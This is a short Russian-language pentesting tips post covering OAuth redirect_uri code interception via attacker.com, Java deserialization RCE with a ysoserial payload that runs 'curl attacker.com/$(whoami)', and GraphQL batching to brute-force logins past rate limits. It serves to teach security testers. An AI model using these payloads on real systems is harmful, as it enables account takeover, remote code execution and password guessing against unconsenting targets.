3 лайфхака для пентестинга — 2 июня 2026 г. в 11:57:37.957
3 лайфхака для пентестинга 👋 Приветствую в мире цифровой безопасности! Расскажу ещё о трех полезных фишках про пентесте. ⏺OAuth Authorization Code Interception: когда приложение принимает произвольный redirect_uri без строгой валидации - authorization code можно перехватить. Регистрируем redirect_uri на подконтрольный сервер: GET /oauth/authorize? client_id=app& redirect_uri=https://attacker.com/callback& response_type=code& scope=read Если сервер редиректит без проверки домена - code прилетает нам. Особенно интересно когда на том же домене есть open redirect - тогда redirect_uri формально валидный: redirect_uri=https://target.com/redirect?url=https://attacker.com ⏺Insecure Deserialization через гаджет-цепочки: приложение десериализует данные от пользователя и если в classpath есть известные библиотеки - можно собрать цепочку ведущую к RCE. Java с Commons Collections - классика: java -jar ysoserial.jar CommonsCollections6 'curl attacker.com/$(whoami)' | base64 curl -X POST https://target.com/api/session \ -H "Content-Type: application/x-java-serialized-object" \ --data-binary @payload.bin Признаки уязвимости: Content-Type: application/x-java-serialized-object, base64 начинающийся с rO0AB, cookie содержащая сериализованный объект. ⏺GraphQL батчинг для обхода rate limiting: introspection в продакшне даёт полную схему API, но интереснее батчинг - несколько запросов в одном HTTP-запросе обходят rate limiting который считает по HTTP-запросам: [ {"query": "mutation { login(user:\"admin\", pass:\"pass1\") }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass2\") }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass3\") }"} ] Сотня попыток брутфорса в одном запросе - rate limiter считает это одним обращением. 🤖Бесплатный ChatGPT

